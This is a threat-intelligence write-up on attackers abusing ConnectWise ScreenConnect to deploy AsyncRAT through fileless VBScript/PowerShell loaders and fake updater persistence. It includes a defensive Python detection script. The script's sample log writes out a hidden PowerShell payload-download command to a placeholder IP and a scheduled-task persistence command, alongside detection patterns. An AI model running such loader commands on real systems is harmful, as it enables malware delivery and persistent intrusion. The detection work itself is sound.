ConnectWise ScreenConnect Exploited: Hackers Deploy AsyncRAT via Fileless Malware Tactics

## TL;DR
Cybercriminals are abusing ConnectWise ScreenConnect, a popular remote desktop tool, to deploy AsyncRAT via fileless malware techniques. Attackers use VBScript and PowerShell loaders to execute malicious payloads in-memory, evading detection, and achieve persistence through a fake Skype updater. This campaign highlights the growing threat of fileless malware and its ability to bypass traditional security measures.


## Introduction
Remote desktop tools like ConnectWise ScreenConnect are widely used by IT professionals and managed service providers (MSPs) for secure, real-time access to endpoints. However, cybercriminals have found a way to exploit this tool to deploy AsyncRAT, a dangerous remote access trojan (RAT). Researchers at LevelBlue have uncovered a campaign where attackers leverage scripted loaders and fileless malware techniques to steal data and maintain persistence on compromised systems.


## How the Attack Unfolds

### 1. Initial Compromise via ScreenConnect
The attack begins with a compromised ScreenConnect client. Threat actors initiate an interactive session through a malicious domain (relay.shipperzone[.]online), which is linked to unauthorized ScreenConnect deployments. This domain serves as the entry point for the attack.

### 2. Execution of VBScript and PowerShell Loaders
Once the session is established, a VBScript triggers PowerShell commands to fetch two malicious payloads:
- logs.ldk
- logs.ldr

These payloads are downloaded from a remote server and stored in the C:\Users\Public\ directory. Instead of saving executables to disk, the attackers execute the payloads directly in memory, using a fileless malware technique that makes detection and defense significantly harder.

"The script converts the first-stage payload (logs.ldk) into a byte array and passes the second (logs.ldr) directly to the Main() method. This technique exemplifies fileless malware: no executable is written to disk, and all malicious logic is executed in-memory." (LevelBlue Research Report[^1])

### 3. In-Memory Execution and Anti-Analysis Tactics
The first in-memory stage of the AsyncRAT infection chain is Obfuscator.dll. This component:
- Launches the execution of the malware.
- Sets up persistence via a fake "Skype Updater".
- Disables defenses like AMSI (Antimalware Scan Interface) and ETW (Event Tracing for Windows).

The malware includes three core classes to handle:
- Initialization
- Dynamic payload loading
- Anti-analysis tactics

These features ensure stealth and prepare the system for the main payload.

### 4. Deployment of AsyncRAT
The core component of the attack is AsyncClient.exe, which serves as the C2 (Command and Control) engine. It performs the following actions:
- Decrypts its AES-256-encrypted configuration data.
- Connects to C2 servers to receive commands.
- Parses commands via a custom protocol.
- Gathers system and security details.
- Monitors user activity with a keylogger.
- Exfiltrates sensitive data, including browser credentials and extensions.

Persistence is maintained through scheduled tasks, created either by the CreateLoginTask() function in Obfuscator.dll or redundantly recreated by AsyncClient.


## Why Fileless Malware is a Growing Threat
Fileless malware continues to evade modern defenses due to its stealthy nature and reliance on legitimate system tools for execution. Unlike traditional malware, which writes executables to disk, fileless malware operates entirely in memory, making it:
- Harder to detect with traditional antivirus solutions.
- More challenging to analyze and eradicate.
- Highly effective at bypassing disk-based detection mechanisms.

"Fileless malware continues to evade modern defenses due to its stealthy nature and reliance on legitimate system tools for execution." (LevelBlue Research Report[^1])

## Mitigation and Defense Strategies
To defend against such attacks, organizations should:
1. Monitor for Unusual ScreenConnect Activity: Look for unauthorized sessions or connections to suspicious domains.
2. Implement Behavioral Detection: Use EDR (Endpoint Detection and Response) solutions to detect in-memory execution and unusual PowerShell activity.
3. Disable Unnecessary Scripting: Restrict the use of VBScript and PowerShell where possible.
4. Enable AMSI and ETW: Ensure these defenses are active and properly configured.
5. Educate Employees: Train staff to recognize phishing attempts and suspicious remote access requests.
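The first two items above (watching for the rogue relay domain and for scripted PowerShell loaders) can be expressed as rules over endpoint telemetry. The Python below is an added example, not code from LevelBlue or ConnectWise; it assumes a constructed key=value log format and uses only the indicators named in this write-up (the relay domain, the logs.ldk/logs.ldr payloads in C:\Users\Public\, the VBScript-to-PowerShell hand-off and the fake "Skype Updater" task).

```python
import re

# Indicators named in the campaign write-up; the log format is constructed.
RELAY_DOMAIN = "relay.shipperzone.online"
PAYLOAD_NAMES = ("logs.ldk", "logs.ldr")
STAGING_DIR = r"c:\users\public"
FAKE_TASK = "skype updater"
DOWNLOAD_API = re.compile(r"downloadfile|downloadstring|invoke-webrequest|\biwr\b")

def parse_fields(line: str) -> dict:
    """Parse the constructed key=value format (quoted values may contain escaped quotes)."""
    pairs = re.findall(r'(\w+)=("(?:[^"\\]|\\.)*"|\S+)', line)
    return {k.lower(): (v[1:-1].replace('\\"', '"') if v.startswith('"') else v)
            for k, v in pairs}

def evaluate(line_no: int, line: str) -> list[tuple[int, str]]:
    """Return (line_no, rule_name) for every rule the line matches."""
    f = parse_fields(line)
    image, parent = f.get("image", "").lower(), f.get("parent", "").lower()
    cmd = f.get("cmdline", "").lower()
    hits = []
    # Rule 1: any process connecting to the unauthorized ScreenConnect relay.
    if RELAY_DOMAIN in f.get("dest", "").lower():
        hits.append((line_no, "screenconnect_relay_domain"))
    # Rule 2: PowerShell fetching the loader payloads into the public directory.
    if "powershell" in image and DOWNLOAD_API.search(cmd) and (
            STAGING_DIR in cmd or any(p in cmd for p in PAYLOAD_NAMES)):
        hits.append((line_no, "powershell_payload_fetch"))
    # Rule 3: a VBScript host (wscript/cscript) handing off to PowerShell.
    if parent in ("wscript.exe", "cscript.exe") and "powershell" in image:
        hits.append((line_no, "vbscript_spawns_powershell"))
    # Rule 4: scheduled-task persistence under the fake Skype updater name.
    if "schtasks" in image and "/create" in cmd and FAKE_TASK in cmd:
        hits.append((line_no, "fake_skype_updater_task"))
    return hits

def scan(log_text: str) -> list[tuple[int, str]]:
    # Line numbers are 1-based so findings can be traced back to the source line.
    return [h for n, l in enumerate(log_text.strip().splitlines(), 1) for h in evaluate(n, l)]

# Constructed sample telemetry (not real captures): 203.0.113.10 is a documentation
# address and example.exe a placeholder for whatever the task would launch.
SAMPLE_LOG = r"""
event=network image=ScreenConnect.ClientService.exe dest=relay.shipperzone.online:443
event=process parent=wscript.exe image=powershell.exe cmdline="powershell -nop -w hidden -c (New-Object Net.WebClient).DownloadFile('http://203.0.113.10/logs.ldk','C:\Users\Public\logs.ldk')"
event=process parent=powershell.exe image=schtasks.exe cmdline="schtasks /create /sc onlogon /tn \"Skype Updater\" /tr C:\Users\Public\example.exe"
event=process parent=explorer.exe image=powershell.exe cmdline="powershell Get-ChildItem C:\Users\Public"
"""
```

The last sample line is a benign PowerShell invocation and produces no finding, which is the false-positive check a rule like Rule 2 needs before it goes into an EDR.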


## Conclusion
The exploitation of ConnectWise ScreenConnect to deploy AsyncRAT underscores the evolving tactics of cybercriminals. By leveraging fileless malware and scripted loaders, attackers can bypass traditional security measures, achieve persistence, and exfiltrate sensitive data. Organizations must adopt proactive defense strategies, including behavioral detection and employee training, to mitigate these advanced threats.

As fileless malware continues to evolve, staying ahead of such attacks will require continuous monitoring, advanced threat detection, and robust cybersecurity practices.


## Additional Resources
For further insights, check:
- LevelBlue Research Report on AsyncRAT Campaign
- ConnectWise ScreenConnect Official Documentation


## References
[^1]: LevelBlue (2025). "Attackers abuse ConnectWise ScreenConnect to drop AsyncRAT". Security Affairs. Retrieved 2025-09-11.